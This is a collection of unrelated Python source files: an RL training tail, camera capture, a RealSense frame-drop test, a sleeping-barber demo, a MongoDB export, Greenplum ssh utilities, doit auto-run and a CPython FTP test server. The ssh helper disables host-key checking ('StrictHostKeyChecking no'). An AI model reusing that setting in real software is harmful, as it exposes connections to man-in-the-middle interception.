global_step, collision_rate, success_rate, avg_reward,
samples, time.strftime("%m-%d %H:%M:%S")
))
total, lifetime, arrived, collided = 0, 0, 0, 0
avg_reward, speed = [], []
tries = -1
cache_id = int(samples) // int(5e6)
if cache_id:
cache_file = agent.checkpoint_file+"-{}".format(cache_id)
if not os.path.exists(cache_file):
torch.save(ckpt, cache_file)
if __name__ == "__main__":
if settings.workers > 1:
assert(settings.workers > 1 and settings.rank is not None)
from rl.distributed import distributed, DistributedSyncHook
if settings.rank == 0:
processes = []
torch.multiprocessing.set_start_method("spawn", force=True)
p = torch.multiprocessing.Process(target=distributed, args=(
partial(train, seed=1, rank=0, hooks=[DistributedSyncHook]),
"gloo", settings.rank, settings.workers
), kwargs=dict(master_addr=settings.master_addr, master_port=settings.master_port))
p.start()
processes.append(p)
evaluate(seed=1+settings.workers, child_processes=processes)
else:
distributed(
partial(train, seed=1+settings.rank, rank=settings.rank, hooks=[DistributedSyncHook]),
"gloo", settings.rank, settings.workers,
master_addr=settings.master_addr, master_port=settings.master_port
)
else:
processes = []
torch.multiprocessing.set_start_method("spawn", force=True)
p = torch.multiprocessing.Process(target=train, kwargs=dict(seed=1, rank=0))
p.start()
processes.append(p)
evaluate(seed=1+settings.workers, child_processes=processes)
|
prototype-picamera.py
|
import picamera
import cv2
import numpy as np
import datetime
import threading
import queue
def read_kbd_input(inputQueue):
print('Press q to quit:')
while (True):
# Receive keyboard input from user.
input_str = input()
# Enqueue this input string.
# Note: Lock not required here since we are only calling a single Queue method, not a sequence of them
# which would otherwise need to be treated as one atomic operation.
inputQueue.put(input_str)
def main():
camera = picamera.PiCamera()
# Optional resolutions: 1920x1080, 1280x720, 640x480
camera.resolution = (1280, 720)
# Get current datetime and compose output video file name.
dt = datetime.datetime.now()
output_file = f"{dt.year}-{dt.month}-{dt.day}_{dt.hour}h{dt.minute}m{dt.second}s.h264"
# Keyboard input queue to pass data from the thread reading the keyboard inputs to the main thread.
inputQueue = queue.Queue()
# Create & start a thread to read keyboard inputs.
# Set daemon to True to auto-kill this thread when all other non-daemonic threads are exited. This is desired since
# this thread has no cleanup to do, which would otherwise require a more graceful approach to clean up then exit.
inputThread = threading.Thread(target=read_kbd_input, args=(inputQueue,), daemon=True)
inputThread.start()
camera.start_recording(output_file)
terminated = False # Sets initial condition on while loop
    while not terminated:
        camera.wait_recording(0.1)  # yield to the encoder instead of busy-waiting; also raises any recording errors
        # if the keyboard input has been entered, check input
if inputQueue.qsize() > 0:
input_str = inputQueue.get()
# If user entered a q, quit the program
if input_str == "q":
terminated = True
camera.stop_recording()
print("Finished recording")
if __name__ == "__main__":
main()
|
test-D455_frame_drops.py
|
# License: Apache 2.0. See LICENSE file in root directory.
# Copyright(c) 2021 Intel Corporation. All Rights Reserved.
#test:device D455
#test:donotrun
import time
import threading
from queue import Queue
from rspy import test
import pyrealsense2 as rs
# Run RGB stream in D455 with 90 fps and find frame drops by checking HW timestamp of each frame
if __name__ == '__main__':
ctx = rs.context()
device = ctx.query_devices()[0]
product_line = device.get_info(rs.camera_info.product_line)
sn = device.get_info(rs.camera_info.serial_number)
fw = device.get_info(rs.camera_info.firmware_version)
print ('found device {}, fw {}'.format(sn, fw))
sensors = device.query_sensors()
depth_ir_sensor = next(s for s in sensors if s.get_info(rs.camera_info.name) == 'Stereo Module')
rgb_sensor = next(s for s in sensors if s.get_info(rs.camera_info.name) == 'RGB Camera')
rgb_profiles = rgb_sensor.profiles
rgb_profile = next(p for p in
rgb_profiles if p.fps() == 90
and p.stream_type() == rs.stream.color
and p.format() == rs.format.yuyv
and ((p.as_video_stream_profile().width() == 424 and p.as_video_stream_profile().height() == 240)
or (p.as_video_stream_profile().width() == 480 and p.as_video_stream_profile().height() == 270)
or (p.as_video_stream_profile().width() == 640 and p.as_video_stream_profile().height() == 360) )
)
class Test:
def __init__(self, rgb_sensor):
self._stop = False
self.frames = []
self.count_drops = 0
self.frame_drops_info = {}
self.prev_hw_timestamp = 0.0
self.prev_fnum = 0
self.first_frame = True
self.lrs_queue = rs.frame_queue(capacity=100000, keep_frames=True)
self.post_process_queue = Queue(maxsize=1000000)
self.rgb_sensor = rgb_sensor
def start_rgb_sensor(self):
self.rgb_sensor.start(self.lrs_queue)
def stop(self):
self._stop = True
def produce_frames(self, timeout=1):
while not self._stop:
try:
lrs_frame = self.lrs_queue.wait_for_frame(timeout_ms=timeout * 1000)
except Exception as e:
                    print(str(e))
                    continue
self.post_process_queue.put(lrs_frame, block=True, timeout=timeout)
def consume_frames(self):
while not self._stop:
element = self.post_process_queue.get(block=True)
lrs_frame = element
self.my_process(lrs_frame)
del lrs_frame
self.post_process_queue.task_done()
def my_process(self, f):
if not f:
return
delta_tolerance_percent = 95.
ideal_delta = round(1000000.0 / 90, 2)
delta_tolerance_in_us = ideal_delta * delta_tolerance_percent / 100.0
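            # With 90 fps the ideal HW-timestamp gap is 1000000/90 ~ 11111.11 us and the
            # tolerance is 95% of that (~ 10555.65 us), so any gap above ~ 21666.76 us
            # (almost two frame periods) is counted as at least one dropped frame.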
if self.first_frame:
self.prev_hw_timestamp = f.get_frame_metadata(rs.frame_metadata_value.frame_timestamp)
self.prev_fnum = f.get_frame_number()
self.first_frame = False
return
curr_hw_timestamp = f.get_frame_metadata(rs.frame_metadata_value.frame_timestamp)
delta = curr_hw_timestamp - self.prev_hw_timestamp
fnum = f.get_frame_number()
if delta > ideal_delta + delta_tolerance_in_us:
self.count_drops += 1
self.frame_drops_info[fnum] = fnum - self.prev_fnum
self.prev_hw_timestamp = curr_hw_timestamp
self.prev_fnum = fnum
#print("* frame drops = ", self.count_drops)
def analysis(self):
print ("Number of frame drops is {}".format(self.count_drops))
            for k, v in self.frame_drops_info.items():
print("Number of dropped frame before frame ", k, ", is :", v)
test.check(self.count_drops == 0)
test.finish()
test.start("Testing D455 frame drops on " + product_line + " device ")
for ii in range(60):
print("================ Iteration {} ================".format(ii))
test = Test(rgb_sensor)
rgb_sensor.set_option(rs.option.global_time_enabled, 0)
rgb_sensor.open([rgb_profile])
producer_thread = threading.Thread(target=test.produce_frames, name="producer_thread")
producer_thread.start()
consumer_thread = threading.Thread(target=test.consume_frames, name="consumer_thread")
consumer_thread.start()
test.start_rgb_sensor()
time.sleep(30)
test.stop() # notify to stop producing-consuming frames
producer_thread.join(timeout=60)
consumer_thread.join(timeout=60)
test.analysis()
rgb_sensor.stop()
rgb_sensor.close()
|
sleeping_barber.py
|
from threading import Thread, Lock, Event
import time, random
#
# ref: https://github.com/bragisig/python-sleeping-barber/blob/master/sleeping_barber.py
#
mutex = Lock()
#Interval in seconds
customerIntervalMin = 5
customerIntervalMax = 15
haircutDurationMin = 3
haircutDurationMax = 15
class BarberShop:
waitingCustomers = []
def __init__(self, barber, numberOfSeats):
self.barber = barber
self.numberOfSeats = numberOfSeats
        print 'BarberShop initialized with {0} seats'.format(numberOfSeats)
print 'Customer min interval {0}'.format(customerIntervalMin)
print 'Customer max interval {0}'.format(customerIntervalMax)
print 'Haircut min duration {0}'.format(haircutDurationMin)
        print 'Haircut max duration {0}'.format(haircutDurationMax)
print '---------------------------------------'
def openShop(self):
print 'Barber shop is opening'
workingThread = Thread(target = self.barberGoToWork)
workingThread.start()
def barberGoToWork(self):
while True:
mutex.acquire()
if len(self.waitingCustomers) > 0:
c = self.waitingCustomers[0]
del self.waitingCustomers[0]
mutex.release()
self.barber.cutHair(c)
else:
mutex.release()
print 'Aaah, all done, going to sleep'
                self.barber.sleep()
print 'Barber woke up'
def enterBarberShop(self, customer):
mutex.acquire()
print '>> {0} entered the shop and is looking for a seat'.format(customer.name)
if len(self.waitingCustomers) == self.numberOfSeats:
print 'Waiting room is full, {0} is leaving.'.format(customer.name)
mutex.release()
else:
print '{0} sat down in the waiting room'.format(customer.name)
            self.waitingCustomers.append(customer)
mutex.release()
            self.barber.wakeUp()
class Customer:
def __init__(self, name):
self.name = name
class Barber:
barberWorkingEvent = Event()
def sleep(self):
self.barberWorkingEvent.wait()
def wakeUp(self):
self.barberWorkingEvent.set()
def cutHair(self, customer):
#Set barber as busy
self.barberWorkingEvent.clear()
print '{0} is having a haircut'.format(customer.name)
randomHairCuttingTime = random.randrange(haircutDurationMin, haircutDurationMax+1)
time.sleep(randomHairCuttingTime)
print '{0} is done'.format(customer.name)
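# Note on the synchronization: barberWorkingEvent doubles as the "sleeping barber" flag.
# sleep() blocks on wait() until a customer triggers wakeUp()/set(); cutHair() clears the
# event first, so once the waiting room empties the next sleep() call blocks again.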
if __name__ == '__main__':
customers = []
customers.append(Customer('Bragi'))
customers.append(Customer('Auja'))
customers.append(Customer('Iris'))
customers.append(Customer('Axel'))
customers.append(Customer('Andrea'))
customers.append(Customer('Agnar'))
customers.append(Customer('Mamma'))
customers.append(Customer('Solla'))
customers.append(Customer('Olla'))
customers.append(Customer('Berglind'))
customers.append(Customer('Bergdis'))
customers.append(Customer('Margret'))
customers.append(Customer('Brynjar'))
customers.append(Customer('Siggi'))
customers.append(Customer('Tomas'))
customers.append(Customer('Kristrun'))
customers.append(Customer('Heidrun'))
barber = Barber()
barberShop = BarberShop(barber, numberOfSeats=3)
barberShop.openShop()
while len(customers) > 0:
c = customers.pop()
#New customer enters the barbershop
barberShop.enterBarberShop(c)
customerInterval = random.randrange(customerIntervalMin,customerIntervalMax+1)
time.sleep(customerInterval)
|
export.py
|
#!/usr/bin/env python
import sys
import os
import csv
import time
import multiprocessing
from Queue import Empty
from datetime import datetime
from collections import namedtuple
from pymongo import Connection
import StringIO
pid = os.getpid()
import_start = time.time()
print '[%s] Loading trie...' % pid
from oxtail.matching import match
print '[%s] Loaded trie in %s seconds.' % (pid, time.time() - import_start)
F = namedtuple('F', ['csv_column', 'transform'])
def deep_get(key, dict, default=None):
if '.' in key:
first, rest = key.split('.', 1)
return deep_get(rest, dict.get(first, {}), default)
else:
out = dict.get(key, default)
return out if out else default
def getter(key, default=''):
return lambda d: deep_get(key, d, default)
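# Worked example (hypothetical document): deep_get('details.organization',
# {'details': {'organization': 'ACME'}}) returns 'ACME', while a missing key falls
# back to the default, e.g. getter('details.organization')({}) returns ''.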
DOCS_QUERY = {'deleted': False}
DOCS_FIELDS = [
F('document_id', getter('document_id')),
F('docket_id', getter('docket_id')),
F('agency', getter('agency')),
F('date_posted', getter('details.receive_date', None)),
F('date_due', getter('details.comment_end_date', None)),
F('title', getter('title')),
F('type', getter('type')),
F('org_name', getter('details.organization')),
F('submitter_name', lambda d: ' '.join(filter(bool, [deep_get('details.first_name', d, None), deep_get('details.mid_initial', d, None), deep_get('details.last_name', d, None)]))),
F('on_type', getter('comment_on.type')),
F('on_id', getter('comment_on.id')),
F('on_title', getter('comment_on.title')),
]
def filter_for_postgres(v):
if v is None:
return '\N'
if isinstance(v, datetime):
return str(v)
return v.encode('utf8').replace("\.", ".")
def process_doc(doc, fields=DOCS_FIELDS):
# field extraction
output = {
'metadata': [filter_for_postgres(f.transform(doc)) for f in fields],
'matches': [],
'submitter_matches': []
}
# entity extraction
if 'views' in doc and doc['views']:
for view in doc['views']:
if 'extracted' in view and view['extracted'] == True:
for entity_id in match(view['text']).keys():
# hack to deal with documents whose scrapes failed but still got extracted
object_id = doc['object_id'] if 'object_id' in doc else view['file'].split('/')[-1].split('.')[0]
output['matches'].append([doc['document_id'], object_id, view['type'], 'view', entity_id])
if 'attachments' in doc and doc['attachments']:
for attachment in doc['attachments']:
if 'views' in attachment and attachment['views']:
for view in attachment['views']:
if 'extracted' in view and view['extracted'] == True:
for entity_id in match(view['text']).keys():
output['matches'].append([doc['document_id'], attachment['object_id'], view['type'], 'attachment', entity_id])
# submitter matches
for entity_id in match('\n'.join([output['metadata'][7], output['metadata'][8]])).keys():
output['submitter_matches'].append([doc['document_id'], entity_id])
return output
# single-core version
def dump_cursor(c, fields, filename):
    metadata_writer = csv.writer(open(filename + '_meta.csv', 'w'))
    metadata_writer.writerow([f.csv_column for f in fields])
    match_writer = csv.writer(open(filename + '_text_matches.csv', 'w'))
    match_writer.writerow(['document_id', 'object_id', 'file_type', 'view_type', 'entity_id'])
    submitter_writer = csv.writer(open(filename + '_submitter_matches.csv', 'w'))
    submitter_writer.writerow(['document_id', 'entity_id'])
for doc in c:
doc_data = process_doc(doc)
metadata_writer.writerow(doc_data['metadata'])
match_writer.writerows(doc_data['matches'])
submitter_writer.writerows(doc_data['submitter_matches'])
# multi-core version and helpers
def write_worker(done_queue, filename, fields=DOCS_FIELDS):
print '[%s] Writer started.' % os.getpid()
    metadata_writer = csv.writer(open(filename + '_meta.csv', 'w'))
    metadata_writer.writerow([f.csv_column for f in fields])
    match_writer = csv.writer(open(filename + '_text_matches.csv', 'w'))
    match_writer.writerow(['document_id', 'object_id', 'file_type', 'view_type', 'entity_id'])
    submitter_writer = csv.writer(open(filename + '_submitter_matches.csv', 'w'))
    submitter_writer.writerow(['document_id', 'entity_id'])
while True:
try:
doc_data = done_queue.get(timeout=20)
except Empty:
print '[%s] CSV writes complete.' % os.getpid()
return
metadata_writer.writerow(doc_data['metadata'])
match_writer.writerows(doc_data['matches'])
submitter_writer.writerows(doc_data['submitter_matches'])
done_queue.task_done()
def process_worker(todo_queue, done_queue):
print '[%s] Worker started.' % os.getpid()
while True:
try:
doc = todo_queue.get(timeout=20)
except Empty:
print '[%s] Processing complete.' % os.getpid()
return
doc_data = process_doc(doc)
done_queue.put(doc_data)
todo_queue.task_done()
def dump_cursor_multi(c, fields, filename, num_workers):
todo_queue = multiprocessing.JoinableQueue(num_workers * 3)
done_queue = multiprocessing.JoinableQueue(num_workers * 3)
for i in range(num_workers):
proc = multiprocessing.Process(target=process_worker, args=(todo_queue, done_queue))
proc.start()
proc = multiprocessing.Process(target=write_worker, args=(done_queue, filename))
proc.start()
for doc in c:
todo_queue.put(doc)
todo_queue.join()
done_queue.join()
if __name__ == '__main__':
# set up options
from optparse import OptionParser
parser = OptionParser(usage="usage: %prog [options] host dbname file_prefix")
parser.add_option("-l", "--limit", dest="limit", action="store", type="int", default=None, help="Limit number of records for testing.")
parser.add_option("-m", "--multi", dest="multi", action="store", type="int", default=None, help="Set number of worker processes. Single-process model used if not specified.")
(options, args) = parser.parse_args()
# fetch options, args
host = args[0]
dbname = args[1]
prefix = args[2]
# do request and analysis
if options.limit:
cursor = Connection(host=host)[dbname].docs.find(DOCS_QUERY, limit=options.limit)
else:
cursor = Connection(host=host)[dbname].docs.find(DOCS_QUERY)
run_start = time.time()
print '[%s] Starting analysis...' % pid
if options.multi:
dump_cursor_multi(cursor, DOCS_FIELDS, prefix, options.multi)
else:
dump_cursor(cursor, DOCS_FIELDS, prefix)
print '[%s] Completed analysis in %s seconds.' % (pid, time.time() - run_start)
|
ssh_utils.py
|
#!/usr/bin/env python
#
# Copyright (c) Greenplum Inc 2008. All Rights Reserved.
#
# This file contains ssh Session class and support functions/classes.
import sys
import os
import cmd
import threading
from gppylib.commands.base import WorkerPool, REMOTE, ExecutionError
from gppylib.commands.unix import Hostname, Echo
sys.path.append(sys.path[0] + '/lib')
import pxssh
import pexpect
import socket
class HostNameError(Exception):
def __init__(self, msg, lineno = 0):
if lineno: self.msg = ('%s at line %d' % (msg, lineno))
else: self.msg = msg
def __str__(self):
return self.msg
class SSHError(Exception):
def __init__(self, msg):
self.msg = msg
def __str__(self):
return self.msg
# Utility Functions
def ssh_prefix(host):
ssh = 'ssh -o "BatchMode yes" -o "StrictHostKeyChecking no" ' + host
return ssh
def get_hosts(hostsfile):
hostlist = HostList()
hostlist.parseFile(hostsfile)
return hostlist.get()
class HostList():
def __init__(self):
self.list = []
def get(self):
return self.list
def add(self, host, lineno=0):
'''Add a host to the hostlist.'''
# we don't allow the user@ syntax here
if host.find('@') >= 0:
raise HostNameError(host, lineno)
# MPP-13617 - check for ipv6
if host.find(':') >= 0:
try:
socket.inet_pton(socket.AF_INET6, host)
except socket.error, e:
raise HostNameError(str(e), lineno)
# MPP-13617 - check for ipv4
if host.find('.') >= 0:
octs = host.split('.')
if len(octs) == 4 and False not in [o.isdigit() for o in octs]:
try:
socket.inet_pton(socket.AF_INET, host)
except socket.error, e:
raise HostNameError(str(e), lineno)
self.list.append(host)
return self.list
def parseFile(self, path):
'''Add lines in a file to the hostlist.'''
with open(path) as fp:
for i, line in enumerate(fp):
line = line.strip()
if not line or line[0] == '#':
continue
self.add(line, i+1)
return self.list
def checkSSH(self):
'''Check that ssh to hostlist is okay.'''
pool = WorkerPool()
for h in self.list:
cmd = Echo('ssh test', '', ctxt=REMOTE, remoteHost=h)
pool.addCommand(cmd)
pool.join()
pool.haltWork()
for cmd in pool.getCompletedItems():
if not cmd.get_results().wasSuccessful():
raise SSHError("Unable to ssh to '%s'" % cmd.remoteHost)
return True
def filterMultiHomedHosts(self):
        '''When multiple hostnames refer to the same node, keep only one of them in the hostlist.'''
unique = {}
pool = WorkerPool()
for h in self.list:
cmd = Hostname('hostname', ctxt=REMOTE, remoteHost=h)
pool.addCommand(cmd)
pool.join()
pool.haltWork()
for finished_cmd in pool.getCompletedItems():
hostname = finished_cmd.get_hostname()
if (not hostname):
unique[finished_cmd.remoteHost] = finished_cmd.remoteHost
elif not unique.get(hostname):
unique[hostname] = finished_cmd.remoteHost
elif hostname == finished_cmd.remoteHost:
unique[hostname] = finished_cmd.remoteHost
self.list = unique.values()
return self.list
# Session is a command session, derived from a base class cmd.Cmd
class Session(cmd.Cmd):
'''Implements a list of open ssh sessions ready to execute commands'''
verbose=False
hostList=[]
userName=None
echoCommand=False
class SessionError(StandardError): pass
class SessionCmdExit(StandardError): pass
def __init__(self, hostList=None, userName=None):
cmd.Cmd.__init__(self)
self.pxssh = []
self.prompt = '=> '
self.peerStringFormatRaw = None
if hostList:
for host in hostList:
self.hostList.append(host)
if userName: self.userName=userName
def peerStringFormat(self):
if self.peerStringFormatRaw: return self.peerStringFormatRaw
cnt = 0
for p in self.pxssh:
if cnt < len(p.x_peer): cnt = len(p.x_peer)
self.peerStringFormatRaw = "[%%%ds]" % cnt
return self.peerStringFormatRaw
def login(self, hostList=None, userName=None):
'''This is the normal entry point used to add host names to the object and log in to each of them'''
if self.verbose: print '\n[Reset ...]'
if not (self.hostList or hostList):
raise self.SessionError('No host list available to Login method')
if not (self.userName or userName):
raise self.SessionError('No user name available to Login method')
#Cleanup
self.clean()
if hostList: #We have a new hostlist to use, initialize it
self.hostList=[]
for host in hostList:
self.hostList.append(host)
if userName: self.userName=userName #We have a new userName to use
# MPP-6583. Save off term type and set to nothing before creating ssh process
origTERM = os.getenv('TERM', None)
os.putenv('TERM', '')
        for host in self.hostList:
p = pxssh.pxssh()
p.loginAsync(host, self.userName)
p.x_peer = host
p.x_pid = p.pid
self.pxssh.append(p)
# Restore terminal type
if origTERM:
os.putenv('TERM', origTERM)
some_errors = False
good_list = []
for p in self.pxssh:
success_login = False
if self.verbose: print '[INFO] login %s' % p.x_peer
try:
success_login = p.loginWait(set_term_dumb=True)
except Exception as e:
pass
if success_login:
good_list.append(p)
else:
some_errors = True
print '[ERROR] unable to login to %s' % p.x_peer
if some_errors:
print 'hint: use gpssh-exkeys to setup public-key authentication between hosts'
self.pxssh = good_list
def close(self):
return self.clean()
def reset(self):
        '''reads from all the ssh connections to make sure we don't have any pending cruft'''
for s in self.pxssh:
s.readlines()
def clean(self):
net_return_code = self.closePxsshList(self.pxssh)
self.pxssh = []
return net_return_code
def emptyline(self):
pass
def escapeLine(self,line):
        '''Escape occurrences of \, " and $ as needed and package the line as an "eval" shell command'''
line = line.strip()
if line == 'EOF' or line == 'exit' or line == 'quit':
raise self.SessionCmdExit()
line = line.split('\\')
line = '\\\\'.join(line)
line = line.split('"')
line = '\\"'.join(line)
line = line.split('$')
line = '\\$'.join(line)
line = 'eval "' + line + '" < /dev/null'
return line
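        # Worked example (hypothetical input): 'echo $HOME' becomes
        # 'eval "echo \$HOME" < /dev/null', so $HOME is expanded by eval on the
        # remote host rather than when the outer command line is first parsed.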
def executeCommand(self,command):
commandoutput=[]
if self.echoCommand:
escapedCommand = command.replace('"', '\\"')
command = 'echo "%s"; %s' % (escapedCommand, command)
#Execute the command in all of the ssh sessions
for s in self.pxssh:
s.sendline(command)
s.flush()
#Wait for each command and retrieve the output
for s in self.pxssh:
#Wait for each command to finish
#!! TODO verify that this is a tight wait loop and find another way to do this
while not s.prompt(120) and s.isalive() and not s.eof(): pass
for s in self.pxssh:
#Split the output into an array of lines so that we can add text to the beginning of
# each line
output = s.before.split('\n')
output = output[1:-1]
commandoutput.append(output)
return commandoutput.__iter__()
# Interactive command line handler
# Override of base class, handles commands that aren't recognized as part of a predefined set
# The "command" argument is a command line to be executed on all available command sessions
# The output of the command execution is printed to the standard output, prepended with
# the hostname of each machine from which the output came
def default(self, command):
line = self.escapeLine(command)
if self.verbose: print command
#Execute the command on our ssh sessions
        commandoutput=self.executeCommand(line)
self.writeCommandOutput(commandoutput)
def writeCommandOutput(self,commandoutput):
'''Takes a list of output lists as an iterator and writes them to standard output,
formatted with the hostname from which each output array was obtained'''
for s in self.pxssh:
output = commandoutput.next()
#Write the output
if len(output) == 0:
print (self.peerStringFormat() % s.x_peer)
else:
for line in output:
print (self.peerStringFormat() % s.x_peer), line
def closePxsshList(self,list):
lock = threading.Lock()
return_codes = [0]
def closePxsshOne(p, return_codes):
p.logout()
p.close()
with lock:
return_codes.append(p.exitstatus)
th = []
for p in list:
t = threading.Thread(target=closePxsshOne, args=(p, return_codes))
t.start()
th.append(t)
for t in th:
t.join()
return max(return_codes)
|
cmd_auto.py
|
"""starts a long-running process that whatches the file system and
automatically execute tasks when file dependencies change"""
import os
import time
import sys
from multiprocessing import Process
from .exceptions import InvalidCommand
from .cmdparse import CmdParse
from .filewatch import FileModifyWatcher
from .cmd_base import tasks_and_deps_iter
from .cmd_base import DoitCmdBase
from .cmd_run import opt_verbosity, Run
opt_reporter = {
'name':'reporter',
'short': None,
'long': None,
'type':str,
'default': 'executed-only',
}
class Auto(DoitCmdBase):
"""the main process will never load tasks,
delegates execution to a forked process.
python caches imported modules,
but using different process we can have dependencies on python
modules making sure the newest module will be used.
"""
doc_purpose = "automatically execute tasks when a dependency changes"
doc_usage = "[TASK ...]"
doc_description = None
execute_tasks = True
cmd_options = (opt_verbosity, opt_reporter)
@staticmethod
def _find_file_deps(tasks, sel_tasks):
"""find all file deps
@param tasks (dict)
@param sel_tasks(list - str)
"""
deps = set()
for task in tasks_and_deps_iter(tasks, sel_tasks):
deps.update(task.file_dep)
deps.update(task.watch)
return deps
@staticmethod
def _dep_changed(watch_files, started, targets):
"""check if watched files was modified since execution started"""
for watched in watch_files:
# assume that changes to targets were done by doit itself
if watched in targets:
continue
if os.stat(watched).st_mtime > started:
return True
return False
def run_watch(self, params, args):
"""Run tasks and wait for file system event
This method is executed in a forked process.
The process is terminated after a single event.
"""
started = time.time()
# execute tasks using Run Command
arun = Run(task_loader=self._loader)
params.add_defaults(CmdParse(arun.options).parse([])[0])
try:
result = arun.execute(params, args)
        # ??? actually tested but coverage doesn't get it...
except InvalidCommand as err: # pragma: no cover
sys.stderr.write("ERROR: %s\n" % str(err))
sys.exit(3)
# get list of files to watch on file system
watch_files = self._find_file_deps(arun.control.tasks,
arun.control.selected_tasks)
        # check for file changes since the run started; if something already
        # changed, skip watching so the outer loop restarts straight away
if not self._dep_changed(watch_files, started, arun.control.targets):
# set event handler. just terminate process.
class DoitAutoRun(FileModifyWatcher):
def handle_event(self, event):
# print("FS EVENT -> {}".format(event))
sys.exit(result)
file_watcher = DoitAutoRun(watch_files)
# kick start watching process
file_watcher.loop()
def execute(self, params, args):
"""loop executing tasks until process is interrupted"""
while True:
try:
proc = Process(target=self.run_watch, args=(params, args))
proc.start()
proc.join()
# if error on given command line, terminate.
if proc.exitcode == 3:
return 3
except KeyboardInterrupt:
return 0
|
test_ftplib.py
|
"""Test script for ftplib module."""
# Modified by Giampaolo Rodola' to test FTP class, IPv6 and TLS
# environment
import ftplib
import asyncore
import asynchat
import socket
import io
import errno
import os
import time
try:
import ssl
except ImportError:
ssl = None
from unittest import TestCase, skipUnless
from test import support
from test.support import HOST, HOSTv6
threading = support.import_module('threading')
# the dummy data returned by server over the data channel when
# RETR, LIST, NLST, MLSD commands are issued
RETR_DATA = 'abcde12345\r\n' * 1000
LIST_DATA = 'foo\r\nbar\r\n'
NLST_DATA = 'foo\r\nbar\r\n'
MLSD_DATA = ("type=cdir;perm=el;unique==keVO1+ZF4; test\r\n"
"type=pdir;perm=e;unique==keVO1+d?3; ..\r\n"
"type=OS.unix=slink:/foobar;perm=;unique==keVO1+4G4; foobar\r\n"
"type=OS.unix=chr-13/29;perm=;unique==keVO1+5G4; device\r\n"
"type=OS.unix=blk-11/108;perm=;unique==keVO1+6G4; block\r\n"
"type=file;perm=awr;unique==keVO1+8G4; writable\r\n"
"type=dir;perm=cpmel;unique==keVO1+7G4; promiscuous\r\n"
"type=dir;perm=;unique==keVO1+1t2; no-exec\r\n"
"type=file;perm=r;unique==keVO1+EG4; two words\r\n"
"type=file;perm=r;unique==keVO1+IH4; leading space\r\n"
"type=file;perm=r;unique==keVO1+1G4; file1\r\n"
"type=dir;perm=cpmel;unique==keVO1+7G4; incoming\r\n"
"type=file;perm=r;unique==keVO1+1G4; file2\r\n"
"type=file;perm=r;unique==keVO1+1G4; file3\r\n"
"type=file;perm=r;unique==keVO1+1G4; file4\r\n")
class DummyDTPHandler(asynchat.async_chat):
dtp_conn_closed = False
def __init__(self, conn, baseclass):
asynchat.async_chat.__init__(self, conn)
self.baseclass = baseclass
self.baseclass.last_received_data = ''
def handle_read(self):
self.baseclass.last_received_data += self.recv(1024).decode('ascii')
def handle_close(self):
# XXX: this method can be called many times in a row for a single
# connection, including in clear-text (non-TLS) mode.
# (behaviour witnessed with test_data_connection)
if not self.dtp_conn_closed:
self.baseclass.push('226 transfer complete')
self.close()
self.dtp_conn_closed = True
def push(self, what):
if self.baseclass.next_data is not None:
what = self.baseclass.next_data
self.baseclass.next_data = None
if not what:
return self.close_when_done()
super(DummyDTPHandler, self).push(what.encode('ascii'))
def handle_error(self):
raise
class DummyFTPHandler(asynchat.async_chat):
dtp_handler = DummyDTPHandler
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
# tells the socket to handle urgent data inline (ABOR command)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_OOBINLINE, 1)
self.set_terminator(b"\r\n")
self.in_buffer = []
self.dtp = None
self.last_received_cmd = None
self.last_received_data = ''
self.next_response = ''
self.next_data = None
self.rest = None
self.next_retr_data = RETR_DATA
self.push('220 welcome')
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = b''.join(self.in_buffer).decode('ascii')
self.in_buffer = []
if self.next_response:
self.push(self.next_response)
self.next_response = ''
cmd = line.split(' ')[0].lower()
self.last_received_cmd = cmd
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('550 command "%s" not understood.' %cmd)
def handle_error(self):
raise
def push(self, data):
asynchat.async_chat.push(self, data.encode('ascii') + b'\r\n')
def cmd_port(self, arg):
addr = list(map(int, arg.split(',')))
ip = '%d.%d.%d.%d' %tuple(addr[:4])
port = (addr[4] * 256) + addr[5]
s = socket.create_connection((ip, port), timeout=2)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_pasv(self, arg):
with socket.socket() as sock:
sock.bind((self.socket.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(10)
ip, port = sock.getsockname()[:2]
            ip = ip.replace('.', ','); p1 = port // 256; p2 = port % 256
self.push('227 entering passive mode (%s,%d,%d)' %(ip, p1, p2))
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
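        # The two trailing numbers of the 227 reply encode the data port as p1*256 + p2,
        # e.g. (hypothetical) port 51234 -> (200, 34) because 200*256 + 34 == 51234.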
def cmd_eprt(self, arg):
af, ip, port = arg.split(arg[0])[1:-1]
port = int(port)
s = socket.create_connection((ip, port), timeout=2)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_epsv(self, arg):
with socket.socket(socket.AF_INET6) as sock:
sock.bind((self.socket.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(10)
port = sock.getsockname()[1]
self.push('229 entering extended passive mode (|||%d|)' %port)
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_noop(self, arg):
self.push('200 noop ok')
def cmd_user(self, arg):
self.push('331 username ok')
def cmd_pass(self, arg):
self.push('230 password ok')
def cmd_acct(self, arg):
self.push('230 acct ok')
def cmd_rnfr(self, arg):
self.push('350 rnfr ok')
def cmd_rnto(self, arg):
self.push('250 rnto ok')
def cmd_dele(self, arg):
self.push('250 dele ok')
def cmd_cwd(self, arg):
self.push('250 cwd ok')
def cmd_size(self, arg):
self.push('250 1000')
def cmd_mkd(self, arg):
self.push('257 "%s"' %arg)
def cmd_rmd(self, arg):
self.push('250 rmd ok')
def cmd_pwd(self, arg):
self.push('257 "pwd ok"')
def cmd_type(self, arg):
self.push('200 type ok')
def cmd_quit(self, arg):
self.push('221 quit ok')
self.close()
def cmd_abor(self, arg):
self.push('226 abor ok')
def cmd_stor(self, arg):
self.push('125 stor ok')
def cmd_rest(self, arg):
self.rest = arg
self.push('350 rest ok')
def cmd_retr(self, arg):
self.push('125 retr ok')
if self.rest is not None:
offset = int(self.rest)
else:
offset = 0
self.dtp.push(self.next_retr_data[offset:])
self.dtp.close_when_done()
self.rest = None
def cmd_list(self, arg):
self.push('125 list ok')
self.dtp.push(LIST_DATA)
